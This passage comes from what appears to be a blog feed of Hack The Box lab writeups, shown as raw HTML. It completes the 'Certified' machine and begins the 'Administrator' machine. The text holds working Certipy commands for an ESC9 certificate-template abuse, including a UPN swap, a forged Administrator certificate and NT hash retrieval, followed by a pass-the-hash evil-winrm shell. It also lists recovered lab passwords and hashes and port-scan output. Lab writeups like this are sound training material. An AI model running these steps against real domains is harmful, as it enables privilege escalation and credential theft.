class="o">(</span>S-1-5-21-729746778-2675978091-3820388244-513<span class="o">)</span> </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\A</span>uthenticated Users <span class="o">(</span>CERTIFIED.HTB-S-1-5-11<span class="o">)</span> </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\D</span>omain Computers <span class="o">(</span>S-1-5-21-729746778-2675978091-3820388244-515<span class="o">)</span> </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\E</span>veryone <span class="o">(</span>CERTIFIED.HTB-S-1-1-0<span class="o">)</span> </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\o</span>perator ca <span class="o">(</span>S-1-5-21-729746778-2675978091-3820388244-1106<span class="o">)</span> </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\U</span>sers <span class="o">(</span>CERTIFIED.HTB-S-1-5-32-545<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Finding certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">34</span> certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Finding certificate authorities </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">1</span> certificate authority </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">12</span> enabled certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;DC01.certified.htb&#39;</span> at <span class="s1">&#39;10.0.2.3&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Failed to resolve: DC01.certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;certified-DC01-CA&#39;</span> via CSRA </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to get DCOM connection <span class="k">for</span>: DC01.certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Got error <span class="k">while</span> trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;certified-DC01-CA&#39;</span> via CSRA: <span class="o">[</span>Errno -2<span class="o">]</span> Name or service not known </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;certified-DC01-CA&#39;</span> via RRP </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Got error <span class="k">while</span> trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;certified-DC01-CA&#39;</span> via RRP: <span class="o">[</span>Errno Connection error <span class="o">(</span>DC01.certified.htb:445<span class="o">)]</span> <span class="o">[</span>Errno -2<span class="o">]</span> Name or service not known </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Failed to get CA configuration <span class="k">for</span> <span class="s1">&#39;certified-DC01-CA&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;DC01.certified.htb&#39;</span> at <span class="s1">&#39;10.0.2.3&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Failed to resolve: DC01.certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Connecting to DC01.certified.htb:80 </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Got error <span class="k">while</span> trying to check <span class="k">for</span> web enrollment: <span class="o">[</span>Errno -2<span class="o">]</span> Name or service not known </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Enumeration output: </span></span><span class="line"><span class="cl">Certificate Authorities </span></span><span class="line"><span class="cl"> <span class="m">0</span> </span></span><span class="line"><span class="cl"> CA Name : certified-DC01-CA </span></span><span class="line"><span class="cl"> DNS Name : DC01.certified.htb </span></span><span class="line"><span class="cl"> Certificate Subject : <span class="nv">CN</span><span class="o">=</span>certified-DC01-CA, <span class="nv">DC</span><span class="o">=</span>certified, <span class="nv">DC</span><span class="o">=</span>htb </span></span><span class="line"><span class="cl"> Certificate Serial Number : 36472F2C180FBB9B4983AD4D60CD5A9D </span></span><span class="line"><span class="cl"> Certificate Validity Start : 2024-05-13 15:33:41+00:00 </span></span><span class="line"><span class="cl"> Certificate Validity End : 2124-05-13 15:43:41+00:00 </span></span><span class="line"><span class="cl"> Web Enrollment : Disabled </span></span><span class="line"><span class="cl"> User Specified SAN : Unknown </span></span><span class="line"><span class="cl"> Request Disposition : Unknown </span></span><span class="line"><span class="cl"> Enforce Encryption <span class="k">for</span> Requests : Unknown </span></span><span class="line"><span class="cl">Certificate Templates </span></span><span class="line"><span class="cl"> <span class="m">0</span> </span></span><span class="line"><span class="cl"> Template Name : CertifiedAuthentication </span></span><span class="line"><span class="cl"> Display Name : Certified Authentication </span></span><span class="line"><span class="cl"> Certificate Authorities : certified-DC01-CA </span></span><span class="line"><span class="cl"> Enabled : True </span></span><span class="line"><span class="cl"> Client Authentication : True </span></span><span class="line"><span class="cl"> Enrollment Agent : False </span></span><span class="line"><span class="cl"> Any Purpose : False </span></span><span class="line"><span class="cl"> Enrollee Supplies Subject : False </span></span><span class="line"><span class="cl"> Certificate Name Flag : SubjectRequireDirectoryPath </span></span><span class="line"><span class="cl"> SubjectAltRequireUpn </span></span><span class="line"><span class="cl"> Enrollment Flag : NoSecurityExtension </span></span><span class="line"><span class="cl"> AutoEnrollment </span></span><span class="line"><span class="cl"> PublishToDs </span></span><span class="line"><span class="cl"> Private Key Flag : <span class="m">16842752</span> </span></span><span class="line"><span class="cl"> Extended Key Usage : Server Authentication </span></span><span class="line"><span class="cl"> Client Authentication </span></span><span class="line"><span class="cl"> Requires Manager Approval : False </span></span><span class="line"><span class="cl"> Requires Key Archival : False </span></span><span class="line"><span class="cl"> Authorized Signatures Required : <span class="m">0</span> </span></span><span class="line"><span class="cl"> Validity Period : <span class="m">1000</span> years </span></span><span class="line"><span class="cl"> Renewal Period : <span class="m">6</span> weeks </span></span><span class="line"><span class="cl"> Minimum RSA Key Length : <span class="m">2048</span> </span></span><span class="line"><span class="cl"> Permissions </span></span><span class="line"><span class="cl"> Enrollment Permissions </span></span><span class="line"><span class="cl"> Enrollment Rights : CERTIFIED.HTB<span class="se">\o</span>perator ca </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> Object Control Permissions </span></span><span class="line"><span class="cl"> Owner : CERTIFIED.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Owner Principals : CERTIFIED.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Dacl Principals : CERTIFIED.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Property Principals : CERTIFIED.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> <span class="o">[</span>!<span class="o">]</span> Vulnerabilities </span></span><span class="line"><span class="cl"> ESC9 : <span class="s1">&#39;CERTIFIED.HTB\\operator ca&#39;</span> can enroll and template has no security extension </span></span></code></pre></td></tr></table> </div> </div><h3 id="exploit-esc9-vulnerability">Exploit ESC9 vulnerability </h3><p>#### Modifying the userPrincipalName (UPN) attribute of ca_operator <strong>management_svc</strong> modifie l’UPN de <strong>ca_operator</strong> (son identifiant d’utilisateur principal) pour qu’il corresponde à Administrator (sans le domaine @corp.local). L’UPN modifié reste valide car il ne correspond pas exactement à celui d’Administrator (qui est <a class="link" href="mailto:Administrator@corp.local" >Administrator@corp.local</a>).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Updating user <span class="s1">&#39;ca_operator&#39;</span>: </span></span><span class="line"><span class="cl"> userPrincipalName : Administrator </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully updated <span class="s1">&#39;ca_operator&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="requesting-certificate">Requesting Certificate </h4><ul> <li>management_svc demande un certificat en se faisant passer pour ca_operator, mais avec l’UPN modifié à Administrator.</li> <li>Le modèle de certificat ESC9 (mal configuré) permet d’émettre un certificat sans inclure de sécurité supplémentaire (par exemple, des extensions empêchant les abus).</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad req -username ca_operator@certified.htb -hashes 94994b74f29662fc4d702f2f3b0df327 -ca certified-DC01-CA -template CertifiedAuthentication </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence <span class="s1">&#39;\(&#39;</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;(0x[a-zA-Z0-9]+) \([-]?[0-9]+ &#34;</span>, </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting certificate via RPC </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully requested certificate </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Request ID is <span class="m">23</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got certificate with UPN <span class="s1">&#39;Administrator&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Certificate has no object SID </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saved certificate and private key to <span class="s1">&#39;administrator.pfx&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="restoring-the-upn-of-ca_operator">Restoring the UPN of ca_operator </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user <span class="s1">&#39;ca_operator&#39;</span> -upn <span class="s1">&#39;ca_operator@certified.htb&#39;</span> -debug </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;CERTIFIED.HTB&#39;</span> at <span class="s1">&#39;10.0.2.3&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Resolved <span class="s1">&#39;CERTIFIED.HTB&#39;</span> from cache: 10.10.11.41 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Authenticating to LDAP server </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Bound to ldaps://10.10.11.41:636 - ssl </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Default path: <span class="nv">DC</span><span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Configuration path: <span class="nv">CN</span><span class="o">=</span>Configuration,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Updating user <span class="s1">&#39;ca_operator&#39;</span>: </span></span><span class="line"><span class="cl"> userPrincipalName : ca_operator@certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully updated <span class="s1">&#39;ca_operator&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="retrieving-nt-hash-via-forged-certificate">Retrieving NT Hash via Forged Certificate </h4><p>Attempting authentication with the issued certificate now yields the NT hash of <a class="link" href="mailto:Administrator@corp.local" >Administrator@corp.local</a>. The command must include -domain <domain> due to the certificate&rsquo;s lack of domain specification:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad auth -pfx ./administrator.pfx -domain certified.htb </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using principal: administrator@certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get TGT... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got TGT </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saved credential cache to <span class="s1">&#39;administrator.ccache&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to retrieve NT <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;administrator&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;administrator@certified.htb&#39;</span>: aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34 </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">evil-winrm -i 10.10.11.41 -u Administrator -H 0d5b49608bbce1751f708748f67e2d34 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function</span> is unimplemented on this machine </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-ar--- 12/10/2024 9:26 AM <span class="m">34</span> root.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; cat root.txt </span></span><span class="line"><span class="cl">dc1c.....fb35 </span></span></code></pre></td></tr></table> </div> </div>HTB | Administratorhttps://leopoldabgn.github.io/writeups/p/administrator-htb/Sun, 01 Dec 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/administrator-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Administrator cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Administrator</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.42</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Olivia : ichliebedich </span></span><span class="line"><span class="cl">alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw </span></span><span class="line"><span class="cl">emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb </span></span><span class="line"><span class="cl">emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur </span></span><span class="line"><span class="cl">ethan : limpbizkit </span></span><span class="line"><span class="cl">Administrator : 3dc553ce4b9fd20bd016e098d2d2fd2e </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="threader-3000">Threader 3000 </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span><span class="lnt">85 </span><span class="lnt">86 </span><span class="lnt">87 </span><span class="lnt">88 </span><span class="lnt">89 </span><span class="lnt">90 </span><span class="lnt">91 </span><span class="lnt">92 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl"> Threader <span class="m">3000</span> - Multi-threaded Port Scanner </span></span><span class="line"><span class="cl"> Version 1.0.7 </span></span><span class="line"><span class="cl"> A project by The Mayor </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Enter your target IP address or URL here: 10.10.11.42 </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Scanning target 10.10.11.42 </span></span><span class="line"><span class="cl">Time started: 2024-11-27 14:54:16.528194 </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Port <span class="m">21</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">139</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">135</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">88</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">464</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">445</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">389</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">593</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">636</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">3268</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">3269</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">5985</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">9389</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">47001</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">49665</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">49668</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">49664</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">49666</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">49670</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53246</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53276</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53268</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53251</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53313</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">63231</span> is open </span></span><span class="line"><span class="cl">Port scan completed in 0:00:08.796993 </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Threader3000 recommends the following Nmap scan: </span></span><span class="line"><span class="cl">************************************************************ </span></span><span class="line"><span class="cl">nmap -p21,53,139,135,88,464,445,389,593,636,3268,3269,5985,9389,47001,49665,49668,49664,49666,49670,53246,53276,53268,53251,53313,63231 -sV -sC -T4 -Pn -oA 10.10.11.42 10.10.11.42 </span></span><span class="line"><span class="cl">************************************************************ </span></span><span class="line"><span class="cl">Would you like to run Nmap or quit to terminal? </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl"><span class="nv">1</span> <span class="o">=</span> Run suggested Nmap scan </span></span><span class="line"><span class="cl"><span class="nv">2</span> <span class="o">=</span> Run another Threader3000 scan </span></span><span class="line"><span class="cl"><span class="nv">3</span> <span class="o">=</span> Exit to terminal </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Option Selection: <span class="m">1</span> </span></span><span class="line"><span class="cl">nmap -p21,53,139,135,88,464,445,389,593,636,3268,3269,5985,9389,47001,49665,49668,49664,49666,49670,53246,53276,53268,53251,53313,63231 -sV -sC -T4 -Pn -oA 10.10.11.42 10.10.11.42 </span></span><span class="line"><span class="cl">Starting Nmap 7.80 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2024-11-27 14:55 CET </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.10.11.42 </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.038s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">21/tcp closed ftp </span></span><span class="line"><span class="cl">53/tcp closed domain </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec Microsoft Windows Kerberos <span class="o">(</span>server time: 2024-11-27 20:55:50Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp closed ldap </span></span><span class="line"><span class="cl">445/tcp closed microsoft-ds </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? </span></span><span class="line"><span class="cl">593/tcp closed http-rpc-epmap </span></span><span class="line"><span class="cl">636/tcp closed ldapssl </span></span><span class="line"><span class="cl">3268/tcp closed globalcatLDAP </span></span><span class="line"><span class="cl">3269/tcp closed globalcatLDAPssl </span></span><span class="line"><span class="cl">5985/tcp closed wsman </span></span><span class="line"><span class="cl">9389/tcp closed adws </span></span><span class="line"><span class="cl">47001/tcp closed winrm </span></span><span class="line"><span class="cl">49664/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49665/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49666/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49668/tcp closed unknown </span></span><span class="line"><span class="cl">49670/tcp closed unknown </span></span><span class="line"><span class="cl">53246/tcp closed unknown </span></span><span class="line"><span class="cl">53251/tcp closed unknown </span></span><span class="line"><span class="cl">53268/tcp closed unknown </span></span><span class="line"><span class="cl">53276/tcp closed unknown </span></span><span class="line"><span class="cl">53313/tcp closed unknown </span></span><span class="line"><span class="cl">63231/tcp closed unknown </span></span><span class="line"><span class="cl">Service Info: OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span>_smb2-security-mode: SMB: Couldn<span class="err">&#39;</span>t find a NetBIOS name that works <span class="k">for</span> the server. Sorry! </span></span><span class="line"><span class="cl"><span class="p">|</span>_smb2-time: ERROR: Script execution failed <span class="o">(</span>use -d to debug<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . </span></span><span class="line"><span class="cl">Nmap <span class="k">done</span>: <span class="m">1</span> IP address <span class="o">(</span><span class="m">1</span> host up<span class="o">)</span> scanned in 65.94 seconds </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Combined scan completed in 0:02:32.888755 </span></span></code></pre></td></tr></table> </div> </div><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span 